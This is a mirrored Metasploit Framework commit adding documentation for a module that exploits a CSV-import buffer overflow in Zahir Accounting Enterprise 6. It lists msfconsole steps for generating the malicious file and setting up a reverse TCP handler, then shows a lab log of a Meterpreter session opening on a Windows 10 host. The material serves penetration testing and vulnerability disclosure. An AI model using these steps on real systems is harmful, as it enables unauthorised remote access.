1
mirror of https://github.com/rapid7/metasploit-framework synced 2024-10-29 18:07:27 +01:00

Add documentation for Zahir Import File Module

This commit is contained in:
Jacob Robles 2018-10-04 10:12:12 -05:00
parent 060c68d2e0
commit b5c13690c0
No known key found for this signature in database
GPG Key ID: 3EC9F18F2B12401C

View File

@ -0,0 +1,41 @@
## Description
Zahir Accounting Enterprise 6 through build 10.b contains a buffer overflow vulnerability in its Import file functionality, which can be triggered with a crafted CSV file.
## Vulnerable Application
[Zahir Enterprise 6](http://zahiraccounting.com/files/zahir-accounting-6-free-trial.zip) through build 10.b
[Update to build 10b](http://zahirsoftware.com/zahirupdate/Zahir_SMB_6_Build10b%20-%20MultiUser.zip)
## Verification Steps
1. `./msfconsole -q`
2. `use exploit/windows/fileformat/zahir_enterprise_plus_csv`
3. `run`
4. `handler -p <payload> -H <lhost> -P <lport>`
5. From Zahir Application. File -> Import -> Import from File -> Select option -> Specify msf generated file -> Click through to Process
6. Get a session
## Scenarios
### Zahir Enterprise 6 build 10b on Windows 10 x64
```
msf5 exploit(windows/fileformat/zahir_enterprise_plus_csv) >
[*] Started reverse TCP handler on 172.22.222.130:4444
[*] Sending stage (179779 bytes) to 172.22.222.200
[*] Meterpreter session 4 opened (172.22.222.130:4444 -> 172.22.222.200:49934) at 2018-10-04 10:09:01 -0500
sessions -i 4
[*] Starting interaction with 4...
meterpreter > sysinfo
Computer : DESKTOP-IPOGIJR
OS : Windows 10 (Build 17134).
Architecture : x64
System Language : en_US
Domain : WORKGROUP
Logged On Users : 2
Meterpreter : x86/windows
meterpreter >
```